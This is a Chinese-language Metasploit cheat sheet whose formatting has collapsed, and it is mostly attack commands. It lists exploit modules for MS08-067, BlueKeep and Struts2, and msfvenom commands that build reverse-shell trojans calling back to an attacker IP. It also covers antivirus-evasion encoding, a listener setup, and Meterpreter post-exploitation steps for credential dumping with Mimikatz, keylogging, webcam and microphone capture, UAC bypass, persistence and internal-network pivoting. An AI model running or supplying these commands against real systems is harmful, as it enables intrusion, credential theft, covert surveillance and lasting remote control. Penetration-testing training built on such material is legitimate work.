Metasploit 基础应用一、MSF 核心架构6大组件组件作用示例Exploit漏洞利用代码exploit/windows/smb/ms08_067_netapiPayload攻击载荷反弹Shell等windows/meterpreter/reverse_tcpAuxiliary辅助模块扫描、嗅探等auxiliary/scanner/portscan/tcpEncoder编码器免杀、绕过x86/shikata_ga_naiPost后渗透模块post/windows/gather/hashdumpNOP空指令填充x86/opty2二、基础操作命令1. 启动与退出msfconsole# 启动msfconsole-q# 静默启动去Bannermsfconsole-xuse ...# 启动后直接执行命令exit/ quit# 退出2. 模块管理search 关键词# 搜索模块如 search ms08_067use 完整模块路径# 加载模块back# 返回上一级info# 查看模块详细信息show options# 查看当前配置参数show targets# 查看目标系统类型show payloads# 查看可用Payload3. 参数设置set参数名 值# 设置参数如 set RHOSTS 192.168.1.1setg 参数名 值# 全局设置所有模块生效unset参数名# 取消设置unsetg 参数名# 取消全局设置4. 执行攻击run# 执行Auxiliary/Post模块exploit# 执行Exploit模块exploit-j# 后台执行exploit-z# 执行后不立即进入会话check# 检测目标是否存在漏洞三、常用模块分类及应用1. 信息收集Auxiliary# 端口扫描use auxiliary/scanner/portscan/tcpsetRHOSTS192.168.1.0/24setPORTS1-1000 run# SMB共享扫描use auxiliary/scanner/smb/smb_share# SSH暴力破解use auxiliary/scanner/ssh/ssh_loginsetUSER_FILE /usr/share/wordlists/users.txtsetPASS_FILE /usr/share/wordlists/passwords.txt2. 漏洞利用Exploit# Windows SMBuse exploit/windows/smb/ms08_067_netapi# Windows RDPuse exploit/windows/rdp/cve_2019_0708_bluekeep# Linux Sambause exploit/linux/samba/is_known_pipename# Web 应用use exploit/multi/http/struts2_rest_xstream use exploit/multi/http/tomcat_mgr_deploy3. Payload 生成msfvenom# 列出所有Payloadmsfvenom-lpayloads# 生成Windows反弹Shell木马msfvenom-pwindows/meterpreter/reverse_tcpLHOST192.168.1.129LPORT4444-fexe-opayload.exe# 生成Linux反弹Shellmsfvenom-plinux/x86/meterpreter/reverse_tcpLHOST192.168.1.129LPORT4444-felf-opayload.elf# 生成PHP WebShellmsfvenom-pphp/meterpreter_reverse_tcpLHOST192.168.1.129LPORT4444-fraw-opayload.php# 编码免杀Shikata Ga Naimsfvenom-pwindows/meterpreter/reverse_tcpLHOST192.168.1.129LPORT4444-ex86/shikata_ga_nai-i5-fexe-opayload_encoded.exe4. 监听配置Handleruse exploit/multi/handlersetPAYLOAD windows/meterpreter/reverse_tcpsetLHOST192.168.1.129setLPORT4444run四、Meterpreter 后渗透操作1. 系统信息sysinfo# 系统信息getuid# 当前用户getpid# 当前进程PIDgetsystem# 提权2. 文件操作pwd/cd/ls# 目录操作upload /root/test.txt C:\\test.txt download C:\\test.txt /root/cat文件名# 查看文件内容edit 文件名# 编辑文件3. 网络操作ipconfig /ifconfig# 查看网络配置arp# 查看ARP表route# 路由表netstat# 端口状态4. 进程管理ps# 查看进程migrate PID号# 迁移进程稳定会话killPID号# 终止进程5. 权限提升getsystem# 自动提权Windowsbypassuac# 绕过UACrun post/windows/escalate/bypassuac6. 信息窃取hashdump# 提取密码Hashdump_credentials# 抓取密码明文kiwi模块load kiwi# 加载Mimikatzcred_all# 提取所有凭证7. 屏幕/键盘screenshot# 截图record_mic# 录音webcam_snap# 摄像头拍照keyscan_start# 键盘记录开始keyscan_dump# 导出键盘记录keyscan_stop# 停止记录8. 持久化run persistence-U-i5-p4444-r192.168.1.129# -U 开机自启, -i 5 每隔5秒重连, -p 端口, -r 攻击机IP9. 跳板内网渗透run autoroute-s192.168.1.0/24# 添加路由run autoroute-p# 查看路由background# 将会话放入后台sessions-i1# 切回会话10. 端口转发portfwdadd-L0.0.0.0-l3389-p3389-r192.168.1.138# 将远程3389转发到本机3389五、常用场景组合命令场景1完全控制一台 Windowsmsfconsole use exploit/windows/smb/ms08_067_netapisetRHOSTS192.168.1.138setLHOST192.168.1.129setLPORT4444run# 会话建立后sysinfo getsystem hashdump screenshot shell场景2内网渗透跳板# 先获取边界服务器会话sessions-lsessions-i1# 添加路由进入内网run autoroute-s192.168.10.0/24# 后台运行background# 扫描内网445端口use auxiliary/scanner/portscan/tcpsetRHOSTS192.168.10.1-254setPORTS445run六、常用辅助工具组合工具作用nmap端口/服务扫描hydra暴力破解sqlmapSQL注入niktoWeb漏洞扫描dirb目录爆破七、数据库管理db_create# 创建数据库db_connect# 连接数据库db_nmap192.168.1.0/24# 扫描结果直接入库hosts# 查看主机列表services# 查看服务列表vulns# 查看漏洞列表八、常用组合快捷键快捷键作用CtrlZ当前会话放入后台CtrlC中断当前操作Tab命令自动补全?查看帮助以上就是 MSF 基础应用的全景图。掌握了这些你就可以完成绝大多数渗透测试任务了